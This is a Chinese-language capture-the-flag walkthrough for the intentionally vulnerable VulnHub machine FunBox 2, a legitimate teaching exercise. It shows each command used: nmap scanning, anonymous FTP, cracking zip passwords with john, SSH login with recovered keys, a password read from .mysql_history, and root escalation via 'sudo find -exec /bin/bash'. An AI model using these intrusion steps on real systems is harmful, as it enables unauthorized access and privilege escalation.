一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:FunBox 2(10.0.2.27)
目标:获取靶机root权限和flag
靶机下载地址:https://download.vulnhub.com/funbox/Funbox2.ova
二、信息收集
使用nmap主机发现靶机ip:10.0.2.27
使用nmap端口扫描发现靶机开放端口:21、22、80
21端口,nmap扫描结果发现ftp存在匿名登录,里面有一些压缩包文件
三、漏洞利用
将压缩包文件都下载下来,解压发现需要密码
使用john工具破解zip文件
zip2john anna.zip > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
破解出两个zip文件的密码:
- cathrine.zip 密码:catwoman
- tom.zip 密码:iubire
解压发现是ssh私钥文件,私钥ssh私钥登录ssh,用户名为压缩包的文件名
unzip tom.zip
ssh -i id_rsa tom@10.0.2.27
四、提权
查看tom用户有什么特权命令可以使用,发现需要tom用户的密码
查看是否有root权限的文件可利用,发现命令被受限,cd命令也用不了
那还是看看tom用户文件夹下是否有信息可利用的
发现.mysql_history
文件,保存有tom用户的密码:xx11yy22!
查看tom用户有什么特权命令可以使用,发现所有命令都可以使用
使用find命令提权,提权成功
sudo find /home -exec /bin/bash \;
获取flag